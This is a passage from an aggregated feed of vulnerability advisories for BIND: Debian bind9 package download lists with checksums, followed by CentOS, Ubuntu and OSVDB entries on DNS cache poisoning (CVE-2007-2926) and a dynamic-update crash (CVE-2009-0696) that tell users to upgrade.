http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3_s390.deb\n Size/MD5 checksum: 295738 7f9b8a22ae80f4a07d2684c94ee962bb\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.2.4-1sarge3_s390.deb\n Size/MD5 checksum: 96376 bb99de7839b8c479d146b075cda4eec7\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.2.4-1sarge3_s390.deb\n Size/MD5 checksum: 167250 ce835a47bbd8e2e24ce84800f5b5e207\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.2.4-1sarge3_s390.deb\n Size/MD5 checksum: 1002430 42bec7cdeecdd61dbc641a1231f1b389\n http://security.debian.org/pool/updates/main/b/bind9/libdns16_9.2.4-1sarge3_s390.deb\n Size/MD5 checksum: 488760 17eb351a64465ea0b3d0110afccb1dd5\n http://security.debian.org/pool/updates/main/b/bind9/libisc7_9.2.4-1sarge3_s390.deb\n Size/MD5 checksum: 166296 07fe033391d502cbfd7abba33d6d8d0c\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.2.4-1sarge3_s390.deb\n Size/MD5 checksum: 78182 f0645ab02f9471efe5edec67b8c0f74e\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg0_9.2.4-1sarge3_s390.deb\n Size/MD5 checksum: 94742 f18ae647e743abedd9609455e80a9bec\n http://security.debian.org/pool/updates/main/b/bind9/liblwres1_9.2.4-1sarge3_s390.deb\n Size/MD5 checksum: 93984 0adfd8465e0e1ec136d8feed953ccf8a\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.2.4-1sarge3_s390.deb\n Size/MD5 checksum: 193682 a9c9ae3b50383e9de32900b086e640c2\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3_sparc.deb\n Size/MD5 checksum: 275498 5cfcadc9ffb2e2c8f4f7b7b0e52d65bc\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.2.4-1sarge3_sparc.deb\n Size/MD5 checksum: 94152 83b1a427fad05d8469b786fc0a2729c0\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.2.4-1sarge3_sparc.deb\n Size/MD5 checksum: 159912 907859f8dc9c4b4701c5e232b0d9f18e\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.2.4-1sarge3_sparc.deb\n Size/MD5 checksum: 1029066 811bb1289ece437352ce4f47f00e8690\n http://security.debian.org/pool/updates/main/b/bind9/libdns16_9.2.4-1sarge3_sparc.deb\n Size/MD5 checksum: 457612 0e91a40c9bee61b6f4d1e0797ac63f22\n http://security.debian.org/pool/updates/main/b/bind9/libisc7_9.2.4-1sarge3_sparc.deb\n Size/MD5 checksum: 158394 7d02a9f43974287cedbbf7dbdfa7d6ad\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.2.4-1sarge3_sparc.deb\n Size/MD5 checksum: 76058 6a93553152a886566ead1c41b03161a1\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg0_9.2.4-1sarge3_sparc.deb\n Size/MD5 checksum: 89468 89542f6aca78589bf139cea4fbf29d97\n http://security.debian.org/pool/updates/main/b/bind9/liblwres1_9.2.4-1sarge3_sparc.deb\n Size/MD5 checksum: 91094 ccec458566cc570211c7add9866db5f0\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.2.4-1sarge3_sparc.deb\n Size/MD5 checksum: 181046 0bf943fbc04728032c7add5e74283ac6\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1.dsc\n Size/MD5 checksum: 758 428b3a45636c78046dbb77d9335a9973\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1.diff.gz\n Size/MD5 checksum: 287783 47a34c979ee9db072b37e2ae0ad0bdec\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4.orig.tar.gz\n Size/MD5 checksum: 4043577 198181d47c58a0a9c0265862cd5557b0\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9-doc_9.3.4-2etch1_all.deb\n Size/MD5 checksum: 186546 3ac7d54f57348ac941d5e0812ccc12f5\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 322456 dfe4b93bc4f56fd5dd0d8e2d1998ad28\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 115188 9e79109d03b06a82561bb3245d85b53c\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 188024 9df9116f4e4d87dd6d1f310506762d05\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 1407446 2c263eb7c5a053db9127f5bb4ea3e63a\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 96012 39238a7c31a2f36fcd55152cf3c3314e\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 566696 a5cb0c0f4e1935fd836d17baed691184\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 189572 8ec031302a94a02a09b0af196bd300dc\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 97650 0075b972a1a8893cd71c66bcaaff95d4\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 111912 cae6cf777332ed408fd6b122198d325f\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 115874 fc5f861aad1689c7aeba2f1f012324ba\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 225398 f4b2582ac5d26563becd0b83e7f054ba\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 317188 4426301631236673c7501c63d7d1be64\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 116584 8485c57afdaefb85a77c2cec61bb0b7b\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 190490 8081ccaac50c67c51e9a49804d22e2f1\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 1110612 dfa5a6f773e5cc985ca15b08cf868afc\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 95162 de0fd449293c68f17886b9fcf8aaf3e0\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 553466 7a6494a6bd042ccf5df4d99d6c5c2542\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 186922 83db82dca4032d2326be7b1bb8624d19\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 95958 76cf006f35ab0fe0d5db1bea77902e7c\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 110608 099dbfa728bbd0ba230362327b96af33\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 113880 b90a561a40975ea4cddd3f59dc2d5a6b\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 223960 34ce7a0693aadc21ece63efc42717dc3\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 311286 ddc9ebd93f06b76792798a6a5bc01d34\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 115332 36e51f58ed0be288c2ab066bd0e1e763\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 187714 7ade5d593bef956f1dd7769c29f6551f\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 1257768 dcffd2d0af9262b3b3c2d1b8166d9c65\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 96256 c10cd5cc0d827b485e7a6b1d06342992\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 545018 c8a2f5a0a086a858ce4ae4e9c096d28c\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 185090 039d93f2286fa4974c360745f6e7ec89\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 96074 98b897d5f0c8ff086514d86801122d30\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 112556 16330ecebbd5be5dcfbfa7acb67c89aa\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 113746 ccb0abb76e39395ec051eac5b10ab3bb\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_hppa.deb\n Size/MD5 checksum: 216754 94ea9e9fc614f3ae44e184d4a070dee8\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 294096 a54d3779c21bc3d3ea13b8991aedd55c\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 112686 91b9f6ad1fe1d3bed4473e844060755d\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 180052 acdaa5225d7a8a46dfa018d33b85917f\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 995710 8d44e9f8b65868d201cc0593c035a0b2\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 94040 208d791ca231d336850b8526b61dc547\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 473758 f0ca4e1c62970bcdb4ca0e4fec82bd20\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 168910 f1be1c9a61bb8c1a7b28a73144a0febc\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 94014 3927f50039cb5a3815d37ee60b8f0805\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 105664 24dd5215d1eb5aabe10f68bd379dfbf5\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 109552 9211a8f796f460cb1674ad233f99f0b8\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_i386.deb\n Size/MD5 checksum: 206122 5f581d25b7eac5d9924633c48374cfd9\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 392704 fbb60f8a53e1df4370f6b1fa04dcaa7f\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 125346 d7b91c0fd8c935dc80d5c2f10dfb71cd\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 215892 d8b6b3e6a35d326074763dcb6f2a02d1\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 1585738 f246e3455fdcc4bede6aaa4feb7e5a4c\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 99586 a6a90361dbe16b55fac090b6221bb2b6\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 742434 2d827017a7f76dbaae60ac1c827c7375\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 231552 8968c74dabdb69eeb4091e8a8d4b2139\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 102034 da5aec0bfc2e2f8c659f563a8774596a\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 117356 99c85d5fd4b7790a8a3fbe0b66c55ce8\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 127150 3f764e3176185b773ddfa988105dce93\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_ia64.deb\n Size/MD5 checksum: 280214 ca7ba1f13de17522a302538390731a11\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 298960 386cfb4312bfed69a2ed12304609a3ed\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 112532 92eb6f06d4a18dca899f5d23caddea3b\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 179148 4ca657710b1071bac2ebd2a27ac1122c\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 1206278 03496e479c5e92c1e4e6bbb63c54f73b\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 93742 cb50eb9cce7422e8879aa796dfdb7b8d\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 489944 ab86bfaff22e47af0bfd3fc57c0db801\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 173664 03c3008a5493f50b453ac239e843a5db\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 94564 5c1aab5f8cee9fac9e678737b5171ecc\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 106766 7d53ee8d69117fdde48a1074cfdd3f1b\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 109844 13abaab553f3c76403b948fea9d0cc1c\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_mipsel.deb\n Size/MD5 checksum: 210372 4bdb416e4876166765b8aa3987d8e339\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 300740 b8f07903829e88e7dd495cb0866a1be4\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 113376 20cdab8f8babc1e60bcc6e34824be459\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 182824 7eb696a4324c5ad3f8b403a977c62c55\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 1169274 289ca4f005063dec3ad819896ba0afb1\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 95760 ca5d0db4143552b8570c766acea14a71\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 490474 ef3bc644324fd9293b8f132e3bdf6eef\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 173214 49a7fec7735be2fa5143280197d2e34d\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 95768 6970420c1ca23d748ed7bdf9efc029e1\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 108868 a0be0fc5c4c666348cc11d3502fa8a30\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 111876 899a074f3970c21cb97e2d0b5a3b3606\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_powerpc.deb\n Size/MD5 checksum: 206322 24bce060644edb83c85a83e1c0d81087\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 331352 1d686878f52e8d8a3a1a10dd5d1eeae2\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 117686 53039a718a231df07de1020ae4062d04\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 194230 4fefe9085f9c27fd11f63b944ebe1583\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 1138900 d511892e9f7b30f034d30d9b10722f67\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 95298 6f5505c5815bd05d5acca2a7bc918f52\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 581310 338f8914e14bfdc50835252d76f0fd42\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 196206 543df937ea45c7b5f784c1c952a7f5e0\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 97416 fa1af3cf8a7416f3ed5b7d42c836b8b2\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 113884 2ec66079b2d2e11cf897f0977729a4c1\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 116232 f5fa31d37e78bbb36f73d53da5da27ea\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_s390.deb\n Size/MD5 checksum: 233484 1dffc0d674f30381bbe5a7ffdbc30518\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 299544 d87837fe5a3f20c6a14fdf3318dd2262\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 113810 f403041c08435061da227325811fa162\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 183572 8af8396c1de389c5d59c043f957f6ffc\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 1122852 f127cc8eaf19ea1afc0e75d95dddfe01\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 94460 5a3a6e60c48ea5a2430852e8f0bdccde\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 495516 6be9e70176aea0f4103f66638d1ddb4e\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 174856 af7512793320752e3607994adcdf5192\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 94450 607818b14e52d297085cf59f207afce7\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 107158 67c296d0d2ca2bd11260b9433bb8b444\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 110702 0237570eab7e9344b78728b6ff4c3a55\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_sparc.deb\n Size/MD5 checksum: 210042 3d5b39b5e149149d314c3d3b0693e057\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2007-07-26T00:00:00", "published": "2007-07-26T00:00:00", "id": "DEBIAN:DSA-1342-2:075A0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00103.html", "title": "[SECURITY] [DSA 1342-2] New bind9 packages fix DNS cache poisoning", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "centos": [{"lastseen": "2020-07-17T03:28:20", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2926"], "description": "**CentOS Errata and Security Advisory** CESA-2007:0740\n\n\nISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols. \r\n\r\nA flaw was found in the way BIND generates outbound DNS query ids. If an\r\nattacker is able to acquire a finite set of query IDs, it becomes possible\r\nto accurately predict future query IDs. Future query ID prediction may\r\nallow an attacker to conduct a DNS cache poisoning attack, which can result\r\nin the DNS server returning incorrect client query data. (CVE-2007-2926)\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain backported patches to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-July/026111.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-July/026112.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-July/026113.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-July/026114.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-July/026116.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-July/026117.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-July/026118.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-July/026119.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-July/026120.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-July/026121.html\n\n**Affected packages:**\nbind\nbind-chroot\nbind-devel\nbind-libbind-devel\nbind-libs\nbind-sdb\nbind-utils\ncaching-nameserver\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0740.html", "edition": 5, "modified": "2007-07-25T13:47:09", "published": "2007-07-24T15:48:10", "href": "http://lists.centos.org/pipermail/centos-announce/2007-July/026111.html", "id": "CESA-2007:0740", "title": "bind, caching security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-12-20T18:28:00", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2926"], "description": "**CentOS Errata and Security Advisory** CESA-2007:0740-01\n\n\nISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols. \r\n\r\nA flaw was found in the way BIND generates outbound DNS query ids. If an\r\nattacker is able to acquire a finite set of query IDs, it becomes possible\r\nto accurately predict future query IDs. Future query ID prediction may\r\nallow an attacker to conduct a DNS cache poisoning attack, which can result\r\nin the DNS server returning incorrect client query data. (CVE-2007-2926)\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain backported patches to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-July/026115.html\n\n**Affected packages:**\nbind\nbind-devel\nbind-utils\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 3, "modified": "2007-07-25T01:16:51", "published": "2007-07-25T01:16:51", "href": "http://lists.centos.org/pipermail/centos-announce/2007-July/026115.html", "id": "CESA-2007:0740-01", "title": "bind security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-08T03:37:11", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0696"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1179\n\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handles dynamic update message packets\ncontaining the \"ANY\" record type. A remote attacker could use this flaw to\nsend a specially-crafted dynamic update packet that could cause named to\nexit with an assertion failure. (CVE-2009-0696)\n\nNote: even if named is not configured for dynamic updates, receiving such\na specially-crafted dynamic update packet could still cause named to exit\nunexpectedly.\n\nAll BIND users are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-July/028090.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-July/028091.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-July/040427.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-July/040428.html\n\n**Affected packages:**\nbind\nbind-chroot\nbind-devel\nbind-libbind-devel\nbind-libs\nbind-sdb\nbind-utils\ncaching-nameserver\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1179.html", "edition": 6, "modified": "2009-07-30T01:08:44", "published": "2009-07-29T19:12:50", "href": "http://lists.centos.org/pipermail/centos-announce/2009-July/028090.html", "id": "CESA-2009:1179", "title": "bind, caching security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2020-07-09T00:28:23", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2926"], "description": "A flaw was discovered in Bind's sequence number generator. A remote \nattacker could calculate future sequence numbers and send forged DNS \nquery responses. This could lead to client connections being directed \nto attacker-controlled hosts, resulting in credential theft and other \nattacks.", "edition": 6, "modified": "2007-07-25T00:00:00", "published": "2007-07-25T00:00:00", "id": "USN-491-1", "href": "https://ubuntu.com/security/notices/USN-491-1", "title": "Bind vulnerability", "type": "ubuntu", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2007-2926"], "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.isc.org/index.pl?/sw/bind/bind-security.php)\n[Vendor Specific Advisory URL](http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01123426)\n[Secunia Advisory ID:26195](https://secuniaresearch.flexerasoftware.com/advisories/26195/)\n[Secunia Advisory ID:26148](https://secuniaresearch.flexerasoftware.com/advisories/26148/)\n[Secunia Advisory ID:26236](https://secuniaresearch.flexerasoftware.com/advisories/26236/)\n[Secunia Advisory ID:26217](https://secuniaresearch.flexerasoftware.com/advisories/26217/)\n[Secunia Advisory ID:26330](https://secuniaresearch.flexerasoftware.com/advisories/26330/)\n[Secunia Advisory ID:26607](https://secuniaresearch.flexerasoftware.com/advisories/26607/)\n[Secunia Advisory ID:26231](https://secuniaresearch.flexerasoftware.com/advisories/26231/)\n[Secunia Advisory ID:26227](https://secuniaresearch.flexerasoftware.com/advisories/26227/)\n[Secunia Advisory ID:26509](https://secuniaresearch.flexerasoftware.com/advisories/26509/)\n[Secunia Advisory ID:26180](https://secuniaresearch.flexerasoftware.com/advisories/26180/)\n[Secunia Advisory ID:26308](https://secuniaresearch.flexerasoftware.com/advisories/26308/)\n[Secunia Advisory ID:26847](https://secuniaresearch.flexerasoftware.com/advisories/26847/)\n[Secunia Advisory ID:26152](https://secuniaresearch.flexerasoftware.com/advisories/26152/)\n[Secunia Advisory ID:26261](https://secuniaresearch.flexerasoftware.com/advisories/26261/)\n[Secunia Advisory ID:26160](https://secuniaresearch.flexerasoftware.com/advisories/26160/)\n[Secunia Advisory ID:26925](https://secuniaresearch.flexerasoftware.com/advisories/26925/)\nRedHat RHSA: RHSA-2007:0740\nOther Advisory URL: http://www.trusteer.com/docs/bind9dns_s.html\nOther Advisory URL: 